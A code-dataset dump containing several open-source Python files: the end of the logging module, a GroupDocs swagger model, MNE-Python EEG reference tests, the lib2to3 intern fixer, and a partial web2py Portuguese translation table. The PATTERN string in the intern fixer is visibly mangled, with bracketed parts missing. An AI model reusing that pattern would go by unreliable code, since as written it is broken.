self.isEnabledFor(level):\n msg, kwargs = self.process(msg, kwargs)\n self.logger._log(level, msg, args, **kwargs)\n\n def isEnabledFor(self, level):\n \"\"\"\n Is this logger enabled for level 'level'?\n \"\"\"\n if self.logger.manager.disable >= level:\n return False\n return level >= self.getEffectiveLevel()\n\n def setLevel(self, level):\n \"\"\"\n Set the specified level on the underlying logger.\n \"\"\"\n self.logger.setLevel(level)\n\n def getEffectiveLevel(self):\n \"\"\"\n Get the effective level for the underlying logger.\n \"\"\"\n return self.logger.getEffectiveLevel()\n\n def hasHandlers(self):\n \"\"\"\n See if the underlying logger has any handlers.\n \"\"\"\n return self.logger.hasHandlers()\n\nroot = RootLogger(WARNING)\nLogger.root = root\nLogger.manager = Manager(Logger.root)\n\n#---------------------------------------------------------------------------\n# Configuration classes and functions\n#---------------------------------------------------------------------------\n\nBASIC_FORMAT = \"%(levelname)s:%(name)s:%(message)s\"\n\ndef basicConfig(**kwargs):\n \"\"\"\n Do basic configuration for the logging system.\n\n This function does nothing if the root logger already has handlers\n configured. It is a convenience method intended for use by simple scripts\n to do one-shot configuration of the logging package.\n\n The default behaviour is to create a StreamHandler which writes to\n sys.stderr, set a formatter using the BASIC_FORMAT format string, and\n add the handler to the root logger.\n\n A number of optional keyword arguments may be specified, which can alter\n the default behaviour.\n\n filename Specifies that a FileHandler be created, using the specified\n filename, rather than a StreamHandler.\n filemode Specifies the mode to open the file, if filename is specified\n (if filemode is unspecified, it defaults to 'a').\n format Use the specified format string for the handler.\n datefmt Use the specified date/time format.\n style If a format string is specified, use this to specify the\n type of format string (possible values '%', '{', '$', for\n %-formatting, :meth:`str.format` and :class:`string.Template`\n - defaults to '%').\n level Set the root logger level to the specified level.\n stream Use the specified stream to initialize the StreamHandler. Note\n that this argument is incompatible with 'filename' - if both\n are present, 'stream' is ignored.\n handlers If specified, this should be an iterable of already created\n handlers, which will be added to the root handler. Any handler\n in the list which does not have a formatter assigned will be\n assigned the formatter created in this function.\n\n Note that you could specify a stream created using open(filename, mode)\n rather than passing the filename and mode in. However, it should be\n remembered that StreamHandler does not close its stream (since it may be\n using sys.stdout or sys.stderr), whereas FileHandler closes its stream\n when the handler is closed.\n\n .. versionchanged:: 3.2\n Added the ``style`` parameter.\n\n .. versionchanged:: 3.3\n Added the ``handlers`` parameter. A ``ValueError`` is now thrown for\n incompatible arguments (e.g. ``handlers`` specified together with\n ``filename``/``filemode``, or ``filename``/``filemode`` specified\n together with ``stream``, or ``handlers`` specified together with\n ``stream``.\n \"\"\"\n # Add thread safety in case someone mistakenly calls\n # basicConfig() from multiple threads\n _acquireLock()\n try:\n if len(root.handlers) == 0:\n handlers = kwargs.get(\"handlers\")\n if handlers is None:\n if \"stream\" in kwargs and \"filename\" in kwargs:\n raise ValueError(\"'stream' and 'filename' should not be \"\n \"specified together\")\n else:\n if \"stream\" in kwargs or \"filename\" in kwargs:\n raise ValueError(\"'stream' or 'filename' should not be \"\n \"specified together with 'handlers'\")\n if handlers is None:\n filename = kwargs.get(\"filename\")\n if filename:\n mode = kwargs.get(\"filemode\", 'a')\n h = FileHandler(filename, mode)\n else:\n stream = kwargs.get(\"stream\")\n h = StreamHandler(stream)\n handlers = [h]\n fs = kwargs.get(\"format\", BASIC_FORMAT)\n dfs = kwargs.get(\"datefmt\", None)\n style = kwargs.get(\"style\", '%')\n fmt = Formatter(fs, dfs, style)\n for h in handlers:\n if h.formatter is None:\n h.setFormatter(fmt)\n root.addHandler(h)\n level = kwargs.get(\"level\")\n if level is not None:\n root.setLevel(level)\n finally:\n _releaseLock()\n\n#---------------------------------------------------------------------------\n# Utility functions at module level.\n# Basically delegate everything to the root logger.\n#---------------------------------------------------------------------------\n\ndef getLogger(name=None):\n \"\"\"\n Return a logger with the specified name, creating it if necessary.\n\n If no name is specified, return the root logger.\n \"\"\"\n if name:\n return Logger.manager.getLogger(name)\n else:\n return root\n\ndef critical(msg, *args, **kwargs):\n \"\"\"\n Log a message with severity 'CRITICAL' on the root logger. If the logger\n has no handlers, call basicConfig() to add a console handler with a\n pre-defined format.\n \"\"\"\n if len(root.handlers) == 0:\n basicConfig()\n root.critical(msg, *args, **kwargs)\n\nfatal = critical\n\ndef error(msg, *args, **kwargs):\n \"\"\"\n Log a message with severity 'ERROR' on the root logger. If the logger has\n no handlers, call basicConfig() to add a console handler with a pre-defined\n format.\n \"\"\"\n if len(root.handlers) == 0:\n basicConfig()\n root.error(msg, *args, **kwargs)\n\ndef exception(msg, *args, **kwargs):\n \"\"\"\n Log a message with severity 'ERROR' on the root logger, with exception\n information. If the logger has no handlers, basicConfig() is called to add\n a console handler with a pre-defined format.\n \"\"\"\n kwargs['exc_info'] = True\n error(msg, *args, **kwargs)\n\ndef warning(msg, *args, **kwargs):\n \"\"\"\n Log a message with severity 'WARNING' on the root logger. If the logger has\n no handlers, call basicConfig() to add a console handler with a pre-defined\n format.\n \"\"\"\n if len(root.handlers) == 0:\n basicConfig()\n root.warning(msg, *args, **kwargs)\n\ndef warn(msg, *args, **kwargs):\n warnings.warn(\"The 'warn' function is deprecated, \"\n \"use 'warning' instead\", DeprecationWarning, 2)\n warning(msg, *args, **kwargs)\n\ndef info(msg, *args, **kwargs):\n \"\"\"\n Log a message with severity 'INFO' on the root logger. If the logger has\n no handlers, call basicConfig() to add a console handler with a pre-defined\n format.\n \"\"\"\n if len(root.handlers) == 0:\n basicConfig()\n root.info(msg, *args, **kwargs)\n\ndef debug(msg, *args, **kwargs):\n \"\"\"\n Log a message with severity 'DEBUG' on the root logger. If the logger has\n no handlers, call basicConfig() to add a console handler with a pre-defined\n format.\n \"\"\"\n if len(root.handlers) == 0:\n basicConfig()\n root.debug(msg, *args, **kwargs)\n\ndef log(level, msg, *args, **kwargs):\n \"\"\"\n Log 'msg % args' with the integer severity 'level' on the root logger. If\n the logger has no handlers, call basicConfig() to add a console handler\n with a pre-defined format.\n \"\"\"\n if len(root.handlers) == 0:\n basicConfig()\n root.log(level, msg, *args, **kwargs)\n\ndef disable(level):\n \"\"\"\n Disable all logging calls of severity 'level' and below.\n \"\"\"\n root.manager.disable = level\n\ndef shutdown(handlerList=_handlerList):\n \"\"\"\n Perform any cleanup actions in the logging system (e.g. flushing\n buffers).\n\n Should be called at application exit.\n \"\"\"\n for wr in reversed(handlerList[:]):\n #errors might occur, for example, if files are locked\n #we just ignore them if raiseExceptions is not set\n try:\n h = wr()\n if h:\n try:\n h.acquire()\n h.flush()\n h.close()\n except (IOError, ValueError):\n # Ignore errors which might be caused\n # because handlers have been closed but\n # references to them are still around at\n # application exit.\n pass\n finally:\n h.release()\n except:\n if raiseExceptions:\n raise\n #else, swallow\n\n#Let's try and shutdown automatically on application exit...\nimport atexit\natexit.register(shutdown)\n\n# Null handler\n\nclass NullHandler(Handler):\n \"\"\"\n This handler does nothing. It's intended to be used to avoid the\n \"No handlers could be found for logger XXX\" one-off warning. This is\n important for library code, which may contain code to log events. If a user\n of the library does not configure logging, the one-off warning might be\n produced; to avoid this, the library developer simply needs to instantiate\n a NullHandler and add it to the top-level logger of the library module or\n package.\n \"\"\"\n def handle(self, record):\n \"\"\"Stub.\"\"\"\n\n def emit(self, record):\n \"\"\"Stub.\"\"\"\n\n def createLock(self):\n self.lock = None\n\n# Warnings integration\n\n_warnings_showwarning = None\n\ndef _showwarning(message, category, filename, lineno, file=None, line=None):\n \"\"\"\n Implementation of showwarnings which redirects to logging, which will first\n check to see if the file parameter is None. If a file is specified, it will\n delegate to the original warnings implementation of showwarning. Otherwise,\n it will call warnings.formatwarning and will log the resulting string to a\n warnings logger named \"py.warnings\" with level logging.WARNING.\n \"\"\"\n if file is not None:\n if _warnings_showwarning is not None:\n _warnings_showwarning(message, category, filename, lineno, file, line)\n else:\n s = warnings.formatwarning(message, category, filename, lineno, line)\n logger = getLogger(\"py.warnings\")\n if not logger.handlers:\n logger.addHandler(NullHandler())\n logger.warning(\"%s\", s)\n\ndef captureWarnings(capture):\n \"\"\"\n If capture is true, redirect all warnings to the logging package.\n If capture is False, ensure that warnings are not redirected to logging\n but to their original destinations.\n \"\"\"\n global _warnings_showwarning\n if capture:\n if _warnings_showwarning is None:\n _warnings_showwarning = warnings.showwarning\n warnings.showwarning = _showwarning\n else:\n if _warnings_showwarning is not None:\n warnings.showwarning = _warnings_showwarning\n _warnings_showwarning = None\n"},"license":{"kind":"string","value":"gpl-3.0"}}},{"rowIdx":2427,"cells":{"repo_name":{"kind":"string","value":"liosha2007/temporary-groupdocs-python-sdk"},"path":{"kind":"string","value":"groupdocs/models/SignatureEnvelopeFieldLocationSettings.py"},"copies":{"kind":"string","value":"2"},"size":{"kind":"string","value":"1794"},"content":{"kind":"string","value":"#!/usr/bin/env python\n\"\"\"\nCopyright 2012 GroupDocs.\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\nclass SignatureEnvelopeFieldLocationSettings:\n \"\"\"\n \n NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\"\"\"\n\n\n def __init__(self):\n self.swaggerTypes = {\n 'page': 'int',\n 'locationX': 'float',\n 'locationY': 'float',\n 'locationWidth': 'float',\n 'locationHeight': 'float',\n 'fontName': 'str',\n 'fontColor': 'str',\n 'fontSize': 'float',\n 'fontBold': 'bool',\n 'fontItalic': 'bool',\n 'fontUnderline': 'bool',\n 'forceNewField': 'bool',\n 'align': 'int'\n\n }\n\n\n self.page = None # int\n self.locationX = None # float\n self.locationY = None # float\n self.locationWidth = None # float\n self.locationHeight = None # float\n self.fontName = None # str\n self.fontColor = None # str\n self.fontSize = None # float\n self.fontBold = None # bool\n self.fontItalic = None # bool\n self.fontUnderline = None # bool\n self.forceNewField = None # bool\n self.align = None # int\n \n"},"license":{"kind":"string","value":"apache-2.0"}}},{"rowIdx":2428,"cells":{"repo_name":{"kind":"string","value":"matthew-tucker/mne-python"},"path":{"kind":"string","value":"mne/io/tests/test_reference.py"},"copies":{"kind":"string","value":"10"},"size":{"kind":"string","value":"13045"},"content":{"kind":"string","value":"# Authors: Marijn van Vliet \n# Alexandre Gramfort \n# Teon Brooks \n#\n# License: BSD (3-clause)\n\nimport warnings\nimport os.path as op\nimport numpy as np\n\nfrom nose.tools import assert_true, assert_equal, assert_raises\nfrom numpy.testing import assert_array_equal, assert_allclose\n\nfrom mne import pick_types, Evoked, Epochs, read_events\nfrom mne.io.constants import FIFF\nfrom mne.io import (set_eeg_reference, set_bipolar_reference,\n add_reference_channels)\nfrom mne.io.proj import _has_eeg_average_ref_proj\nfrom mne.io.reference import _apply_reference\nfrom mne.datasets import testing\nfrom mne.io import Raw\n\nwarnings.simplefilter('always') # enable b/c these tests throw warnings\n\ndata_dir = op.join(testing.data_path(download=False), 'MEG', 'sample')\nfif_fname = op.join(data_dir, 'sample_audvis_trunc_raw.fif')\neve_fname = op.join(data_dir, 'sample_audvis_trunc_raw-eve.fif')\nave_fname = op.join(data_dir, 'sample_audvis_trunc-ave.fif')\n\n\ndef _test_reference(raw, reref, ref_data, ref_from):\n \"\"\"Helper function to test whether a reference has been correctly\n applied.\"\"\"\n # Separate EEG channels from other channel types\n picks_eeg = pick_types(raw.info, meg=False, eeg=True, exclude='bads')\n picks_other = pick_types(raw.info, meg=True, eeg=False, eog=True,\n stim=True, exclude='bads')\n\n # Calculate indices of reference channesl\n picks_ref = [raw.ch_names.index(ch) for ch in ref_from]\n\n # Get data\n if isinstance(raw, Evoked):\n _data = raw.data\n _reref = reref.data\n else:\n _data = raw._data\n _reref = reref._data\n\n # Check that the ref has been properly computed\n assert_array_equal(ref_data, _data[..., picks_ref, :].mean(-2))\n\n # Get the raw EEG data and other channel data\n raw_eeg_data = _data[..., picks_eeg, :]\n raw_other_data = _data[..., picks_other, :]\n\n # Get the rereferenced EEG data\n reref_eeg_data = _reref[..., picks_eeg, :]\n reref_other_data = _reref[..., picks_other, :]\n\n # Undo rereferencing of EEG channels\n if isinstance(raw, Epochs):\n unref_eeg_data = reref_eeg_data + ref_data[:, np.newaxis, :]\n else:\n unref_eeg_data = reref_eeg_data + ref_data\n\n # Check that both EEG data and other data is the same\n assert_allclose(raw_eeg_data, unref_eeg_data, 1e-6, atol=1e-15)\n assert_allclose(raw_other_data, reref_other_data, 1e-6, atol=1e-15)\n\n\n@testing.requires_testing_data\ndef test_apply_reference():\n \"\"\"Test base function for rereferencing\"\"\"\n raw = Raw(fif_fname, preload=True)\n\n # Rereference raw data by creating a copy of original data\n reref, ref_data = _apply_reference(raw, ref_from=['EEG 001', 'EEG 002'],\n copy=True)\n assert_true(reref.info['custom_ref_applied'])\n _test_reference(raw, reref, ref_data, ['EEG 001', 'EEG 002'])\n\n # The CAR reference projection should have been removed by the function\n assert_true(not _has_eeg_average_ref_proj(reref.info['projs']))\n\n # Test that disabling the reference does not break anything\n reref, ref_data = _apply_reference(raw, [])\n assert_array_equal(raw._data, reref._data)\n\n # Test that data is modified in place when copy=False\n reref, ref_data = _apply_reference(raw, ['EEG 001', 'EEG 002'],\n copy=False)\n assert_true(raw is reref)\n\n # Test re-referencing Epochs object\n raw = Raw(fif_fname, preload=False, add_eeg_ref=False)\n events = read_events(eve_fname)\n picks_eeg = pick_types(raw.info, meg=False, eeg=True)\n epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5,\n picks=picks_eeg, preload=True)\n reref, ref_data = _apply_reference(epochs, ref_from=['EEG 001', 'EEG 002'],\n copy=True)\n assert_true(reref.info['custom_ref_applied'])\n _test_reference(epochs, reref, ref_data, ['EEG 001', 'EEG 002'])\n\n # Test re-referencing Evoked object\n evoked = epochs.average()\n reref, ref_data = _apply_reference(evoked, ref_from=['EEG 001', 'EEG 002'],\n copy=True)\n assert_true(reref.info['custom_ref_applied'])\n _test_reference(evoked, reref, ref_data, ['EEG 001', 'EEG 002'])\n\n # Test invalid input\n raw_np = Raw(fif_fname, preload=False)\n assert_raises(RuntimeError, _apply_reference, raw_np, ['EEG 001'])\n\n\n@testing.requires_testing_data\ndef test_set_eeg_reference():\n \"\"\"Test rereference eeg data\"\"\"\n raw = Raw(fif_fname, preload=True)\n raw.info['projs'] = []\n\n # Test setting an average reference\n assert_true(not _has_eeg_average_ref_proj(raw.info['projs']))\n reref, ref_data = set_eeg_reference(raw)\n assert_true(_has_eeg_average_ref_proj(reref.info['projs']))\n assert_true(ref_data is None)\n\n # Test setting an average reference when one was already present\n reref, ref_data = set_eeg_reference(raw, copy=False)\n assert_true(ref_data is None)\n\n # Rereference raw data by creating a copy of original data\n reref, ref_data = set_eeg_reference(raw, ['EEG 001', 'EEG 002'], copy=True)\n assert_true(reref.info['custom_ref_applied'])\n _test_reference(raw, reref, ref_data, ['EEG 001', 'EEG 002'])\n\n # Test that data is modified in place when copy=False\n reref, ref_data = set_eeg_reference(raw, ['EEG 001', 'EEG 002'],\n copy=False)\n assert_true(raw is reref)\n\n\n@testing.requires_testing_data\ndef test_set_bipolar_reference():\n \"\"\"Test bipolar referencing\"\"\"\n raw = Raw(fif_fname, preload=True)\n reref = set_bipolar_reference(raw, 'EEG 001', 'EEG 002', 'bipolar',\n {'kind': FIFF.FIFFV_EOG_CH,\n 'extra': 'some extra value'})\n assert_true(reref.info['custom_ref_applied'])\n\n # Compare result to a manual calculation\n a = raw.pick_channels(['EEG 001', 'EEG 002'], copy=True)\n a = a._data[0, :] - a._data[1, :]\n b = reref.pick_channels(['bipolar'], copy=True)._data[0, :]\n assert_allclose(a, b)\n\n # Original channels should be replaced by a virtual one\n assert_true('EEG 001' not in reref.ch_names)\n assert_true('EEG 002' not in reref.ch_names)\n assert_true('bipolar' in reref.ch_names)\n\n # Check channel information\n bp_info = reref.info['chs'][reref.ch_names.index('bipolar')]\n an_info = reref.info['chs'][raw.ch_names.index('EEG 001')]\n for key in bp_info:\n if key == 'loc' or key == 'eeg_loc':\n assert_array_equal(bp_info[key], 0)\n elif key == 'coil_type':\n assert_equal(bp_info[key], FIFF.FIFFV_COIL_EEG_BIPOLAR)\n elif key == 'kind':\n assert_equal(bp_info[key], FIFF.FIFFV_EOG_CH)\n else:\n assert_equal(bp_info[key], an_info[key])\n assert_equal(bp_info['extra'], 'some extra value')\n\n # Minimalist call\n reref = set_bipolar_reference(raw, 'EEG 001', 'EEG 002')\n assert_true('EEG 001-EEG 002' in reref.ch_names)\n\n # Test creating a bipolar reference that doesn't involve EEG channels:\n # it should not set the custom_ref_applied flag\n reref = set_bipolar_reference(raw, 'MEG 0111', 'MEG 0112',\n ch_info={'kind': FIFF.FIFFV_MEG_CH})\n assert_true(not reref.info['custom_ref_applied'])\n assert_true('MEG 0111-MEG 0112' in reref.ch_names)\n\n # Test a battery of invalid inputs\n assert_raises(ValueError, set_bipolar_reference, raw,\n 'EEG 001', ['EEG 002', 'EEG 003'], 'bipolar')\n assert_raises(ValueError, set_bipolar_reference, raw,\n ['EEG 001', 'EEG 002'], 'EEG 003', 'bipolar')\n assert_raises(ValueError, set_bipolar_reference, raw,\n 'EEG 001', 'EEG 002', ['bipolar1', 'bipolar2'])\n assert_raises(ValueError, set_bipolar_reference, raw,\n 'EEG 001', 'EEG 002', 'bipolar',\n ch_info=[{'foo': 'bar'}, {'foo': 'bar'}])\n assert_raises(ValueError, set_bipolar_reference, raw,\n 'EEG 001', 'EEG 002', ch_name='EEG 003')\n\n\n@testing.requires_testing_data\ndef test_add_reference():\n raw = Raw(fif_fname, preload=True)\n picks_eeg = pick_types(raw.info, meg=False, eeg=True)\n # check if channel already exists\n assert_raises(ValueError, add_reference_channels,\n raw, raw.info['ch_names'][0])\n # add reference channel to Raw\n raw_ref = add_reference_channels(raw, 'Ref', copy=True)\n assert_equal(raw_ref._data.shape[0], raw._data.shape[0] + 1)\n assert_array_equal(raw._data[picks_eeg, :], raw_ref._data[picks_eeg, :])\n\n orig_nchan = raw.info['nchan']\n raw = add_reference_channels(raw, 'Ref', copy=False)\n assert_array_equal(raw._data, raw_ref._data)\n assert_equal(raw.info['nchan'], orig_nchan + 1)\n\n ref_idx = raw.ch_names.index('Ref')\n ref_data, _ = raw[ref_idx]\n assert_array_equal(ref_data, 0)\n\n # add two reference channels to Raw\n raw = Raw(fif_fname, preload=True)\n picks_eeg = pick_types(raw.info, meg=False, eeg=True)\n assert_raises(ValueError, add_reference_channels, raw,\n raw.info['ch_names'][0])\n raw_ref = add_reference_channels(raw, ['M1', 'M2'], copy=True)\n assert_equal(raw_ref._data.shape[0], raw._data.shape[0] + 2)\n assert_array_equal(raw._data[picks_eeg, :], raw_ref._data[picks_eeg, :])\n\n raw = add_reference_channels(raw, ['M1', 'M2'], copy=False)\n ref_idx = raw.ch_names.index('M1')\n ref_idy = raw.ch_names.index('M2')\n ref_data, _ = raw[[ref_idx, ref_idy]]\n assert_array_equal(ref_data, 0)\n\n # add reference channel to epochs\n raw = Raw(fif_fname, preload=True)\n events = read_events(eve_fname)\n picks_eeg = pick_types(raw.info, meg=False, eeg=True)\n epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5,\n picks=picks_eeg, preload=True)\n epochs_ref = add_reference_channels(epochs, 'Ref', copy=True)\n assert_equal(epochs_ref._data.shape[1], epochs._data.shape[1] + 1)\n ref_idx = epochs_ref.ch_names.index('Ref')\n ref_data = epochs_ref.get_data()[:, ref_idx, :]\n assert_array_equal(ref_data, 0)\n picks_eeg = pick_types(epochs.info, meg=False, eeg=True)\n assert_array_equal(epochs.get_data()[:, picks_eeg, :],\n epochs_ref.get_data()[:, picks_eeg, :])\n\n # add two reference channels to epochs\n raw = Raw(fif_fname, preload=True)\n events = read_events(eve_fname)\n picks_eeg = pick_types(raw.info, meg=False, eeg=True)\n epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5,\n picks=picks_eeg, preload=True)\n epochs_ref = add_reference_channels(epochs, ['M1', 'M2'], copy=True)\n assert_equal(epochs_ref._data.shape[1], epochs._data.shape[1] + 2)\n ref_idx = epochs_ref.ch_names.index('M1')\n ref_idy = epochs_ref.ch_names.index('M2')\n ref_data = epochs_ref.get_data()[:, [ref_idx, ref_idy], :]\n assert_array_equal(ref_data, 0)\n picks_eeg = pick_types(epochs.info, meg=False, eeg=True)\n assert_array_equal(epochs.get_data()[:, picks_eeg, :],\n epochs_ref.get_data()[:, picks_eeg, :])\n\n # add reference channel to evoked\n raw = Raw(fif_fname, preload=True)\n events = read_events(eve_fname)\n picks_eeg = pick_types(raw.info, meg=False, eeg=True)\n epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5,\n picks=picks_eeg, preload=True)\n evoked = epochs.average()\n evoked_ref = add_reference_channels(evoked, 'Ref', copy=True)\n assert_equal(evoked_ref.data.shape[0], evoked.data.shape[0] + 1)\n ref_idx = evoked_ref.ch_names.index('Ref')\n ref_data = evoked_ref.data[ref_idx, :]\n assert_array_equal(ref_data, 0)\n picks_eeg = pick_types(evoked.info, meg=False, eeg=True)\n assert_array_equal(evoked.data[picks_eeg, :],\n evoked_ref.data[picks_eeg, :])\n\n # add two reference channels to evoked\n raw = Raw(fif_fname, preload=True)\n events = read_events(eve_fname)\n picks_eeg = pick_types(raw.info, meg=False, eeg=True)\n epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5,\n picks=picks_eeg, preload=True)\n evoked = epochs.average()\n evoked_ref = add_reference_channels(evoked, ['M1', 'M2'], copy=True)\n assert_equal(evoked_ref.data.shape[0], evoked.data.shape[0] + 2)\n ref_idx = evoked_ref.ch_names.index('M1')\n ref_idy = evoked_ref.ch_names.index('M2')\n ref_data = evoked_ref.data[[ref_idx, ref_idy], :]\n assert_array_equal(ref_data, 0)\n picks_eeg = pick_types(evoked.info, meg=False, eeg=True)\n assert_array_equal(evoked.data[picks_eeg, :],\n evoked_ref.data[picks_eeg, :])\n\n # Test invalid inputs\n raw_np = Raw(fif_fname, preload=False)\n assert_raises(RuntimeError, add_reference_channels, raw_np, ['Ref'])\n assert_raises(ValueError, add_reference_channels, raw, 1)\n"},"license":{"kind":"string","value":"bsd-3-clause"}}},{"rowIdx":2429,"cells":{"repo_name":{"kind":"string","value":"valkjsaaa/sl4a"},"path":{"kind":"string","value":"python/src/Lib/lib2to3/fixes/fix_intern.py"},"copies":{"kind":"string","value":"49"},"size":{"kind":"string","value":"1368"},"content":{"kind":"string","value":"# Copyright 2006 Georg Brandl.\n# Licensed to PSF under a Contributor Agreement.\n\n\"\"\"Fixer for intern().\n\nintern(s) -> sys.intern(s)\"\"\"\n\n# Local imports\nfrom .. import pytree\nfrom .. import fixer_base\nfrom ..fixer_util import Name, Attr, touch_import\n\n\nclass FixIntern(fixer_base.BaseFix):\n\n PATTERN = \"\"\"\n power< 'intern'\n trailer< lpar='('\n ( not(arglist | argument) any ','> )\n rpar=')' >\n after=any*\n >\n \"\"\"\n\n def transform(self, node, results):\n syms = self.syms\n obj = results[\"obj\"].clone()\n if obj.type == syms.arglist:\n newarglist = obj.clone()\n else:\n newarglist = pytree.Node(syms.arglist, [obj.clone()])\n after = results[\"after\"]\n if after:\n after = [n.clone() for n in after]\n new = pytree.Node(syms.power,\n Attr(Name(\"sys\"), Name(\"intern\")) +\n [pytree.Node(syms.trailer,\n [results[\"lpar\"].clone(),\n newarglist,\n results[\"rpar\"].clone()])] + after)\n new.set_prefix(node.get_prefix())\n touch_import(None, 'sys', node)\n return new\n"},"license":{"kind":"string","value":"apache-2.0"}}},{"rowIdx":2430,"cells":{"repo_name":{"kind":"string","value":"urrego093/proyecto_mv"},"path":{"kind":"string","value":"applications/welcome/languages/pt-br.py"},"copies":{"kind":"string","value":"88"},"size":{"kind":"string","value":"7249"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\n{\n'!langcode!': 'pt-br',\n'!langname!': 'Português (do Brasil)',\n'\"update\" is an optional expression like \"field1=\\'newvalue\\'\". You cannot update or delete the results of a JOIN': '\"update\" é uma expressão opcional como \"campo1=\\'novovalor\\'\". Você não pode atualizar ou apagar os resultados de um JOIN',\n'%s %%{row} deleted': '%s linhas apagadas',\n'%s %%{row} updated': '%s linhas atualizadas',\n'%s selected': '%s selecionado',\n'%Y-%m-%d': '%d-%m-%Y',\n'%Y-%m-%d %H:%M:%S': '%d-%m-%Y %H:%M:%S',\n'About': 'Sobre',\n'Access Control': 'Controle de Acesso',\n'Administrative Interface': 'Interface Administrativa',\n'@markmin\\x01An error occured, please [[reload %s]] the page': 'Ocorreu um erro, por favor [[reload %s]] a página',\n'Administrative interface': 'Interface administrativa',\n'Ajax Recipes': 'Receitas de Ajax',\n'appadmin is disabled because insecure channel': 'Administração desativada porque o canal não é seguro',\n'Are you sure you want to delete this object?': 'Você está certo que deseja apagar este objeto?',\n'Available Databases and Tables': 'Bancos de dados e tabelas disponíveis',\n'Buy this book': 'Compre o livro',\n'cache': 'cache',\n'Cache': 'Cache',\n'Cache Keys': 'Chaves de cache',\n'Cannot be empty': 'Não pode ser vazio',\n'change password': 'modificar senha',\n'Check to delete': 'Marque para apagar',\n'Clear CACHE?': 'Limpar CACHE?',\n'Clear DISK': 'Limpar DISCO',\n'Clear RAM': 'Limpar memória RAM',\n'Client IP': 'IP do cliente',\n'Community': 'Comunidade',\n'Components and Plugins': 'Componentes e Plugins',\n'Controller': 'Controlador',\n'Copyright': 'Copyright',\n'Current request': 'Requisição atual',\n'Current response': 'Resposta atual',\n'Current session': 'Sessão atual',\n'customize me!': 'Personalize-me!',\n'data uploaded': 'dados enviados',\n'Database': 'banco de dados',\n'Database %s select': 'Selecionar banco de dados %s',\n'db': 'bd',\n'DB Model': 'Modelo BD',\n'Delete:': 'Apagar:',\n'Demo': 'Demo',\n'Deployment Recipes': 'Receitas de deploy',\n'Description': 'Descrição',\n'design': 'projeto',\n'DISK': 'DISK',\n'Disk Cache Keys': 'Chaves do Cache de Disco',\n'Disk Cleared': 'Disco Limpo',\n'Documentation': 'Documentação',\n\"Don't know what to do?\": \"Não sabe o que fazer?\",\n'done!': 'concluído!',\n'Download': 'Download',\n'E-mail': 'E-mail',\n'Edit': 'Editar',\n'Edit current record': 'Editar o registro atual',\n'edit profile': 'editar perfil',\n'Edit This App': 'Editar esta aplicação',\n'Email and SMS': 'Email e SMS',\n'Errors': 'Erros',\n'Enter an integer between %(min)g and %(max)g': 'Informe um valor inteiro entre %(min)g e %(max)g',\n'export as csv file': 'exportar como um arquivo csv',\n'FAQ': 'Perguntas frequentes',\n'First name': 'Nome',\n'Forms and Validators': 'Formulários e Validadores',\n'Free Applications': 'Aplicações gratuitas',\n'Group ID': 'ID do Grupo',\n'Groups': 'Grupos',\n'Hello World': 'Olá Mundo',\n'Home': 'Principal',\n'How did you get here?': 'Como você chegou aqui?',\n'import': 'importar',\n'Import/Export': 'Importar/Exportar',\n'Index': 'Início',\n'insert new': 'inserir novo',\n'insert new %s': 'inserir novo %s',\n'Internal State': 'Estado Interno',\n'Introduction': 'Introdução',\n'Invalid email': 'Email inválido',\n'Invalid Query': 'Consulta Inválida',\n'invalid request': 'requisição inválida',\n'Key': 'Chave',\n'Last name': 'Sobrenome',\n'Layout': 'Layout',\n'Layout Plugins': 'Plugins de Layout',\n'Layouts': 'Layouts',\n'Live chat': 'Chat ao vivo',\n'Live Chat': 'Chat ao vivo',\n'login': 'Entrar',\n'Login': 'Autentique-se',\n'logout': 'Sair',\n'Lost Password': 'Esqueceu sua senha?',\n'lost password?': 'esqueceu sua senha?',\n'Main Menu': 'Menu Principal',\n'Manage Cache': 'Gerenciar Cache',\n'Menu Model': 'Modelo de Menu',\n'My Sites': 'Meus sites',\n'Name': 'Nome',\n'New Record': 'Novo Registro',\n'new record inserted': 'novo registro inserido',\n'next 100 rows': 'próximas 100 linhas',\n'No databases in this application': 'Não há bancos de dados nesta aplicação',\n'Object or table name': 'Nome do objeto do da tabela',\n'Online examples': 'Exemplos online',\n'or import from csv file': 'ou importar de um arquivo csv',\n'Origin': 'Origem',\n'Other Plugins': 'Outros Plugins',\n'Other Recipes': 'Outras Receitas',\n'Overview': 'Visão Geral',\n'Password': 'Senha',\n'Plugins': 'Plugins',\n'Powered by': 'Desenvolvido com',\n'Preface': 'Prefácio',\n'previous 100 rows': '100 linhas anteriores',\n'Python': 'Python',\n'Query:': 'Consulta:',\n'Quick Examples': 'Exemplos rápidos',\n'RAM': 'RAM',\n'RAM Cache Keys': 'RAM Cache Keys',\n'Ram Cleared': 'Ram Cleared',\n'Recipes': 'Receitas',\n'Record': 'Registro',\n'record does not exist': 'registro não existe',\n'Record ID': 'ID do Registro',\n'Record id': 'id do registro',\n'Register': 'Registre-se',\n'register': 'Registre-se',\n'Registration key': 'Chave de registro',\n'Reset Password key': 'Resetar chave de senha',\n'Resources': 'Recursos',\n'Role': 'Papel',\n'Registration identifier': 'Idenficador de registro',\n'Rows in Table': 'Linhas na tabela',\n'Rows selected': 'Linhas selecionadas',\n'Semantic': 'Semântico',\n'Services': 'Serviço',\n'Size of cache:': 'Tamanho do cache:',\n'state': 'estado',\n'Statistics': 'Estatísticas',\n'Stylesheet': 'Folha de estilo',\n'submit': 'enviar',\n'Support': 'Suporte',\n'Sure you want to delete this object?': 'Está certo(a) que deseja apagar este objeto?',\n'Table': 'Tabela',\n'Table name': 'Nome da tabela',\n'The \"query\" is a condition like \"db.table1.field1==\\'value\\'\". Something like \"db.table1.field1==db.table2.field2\" results in a SQL JOIN.': 'Uma \"consulta\" é uma condição como 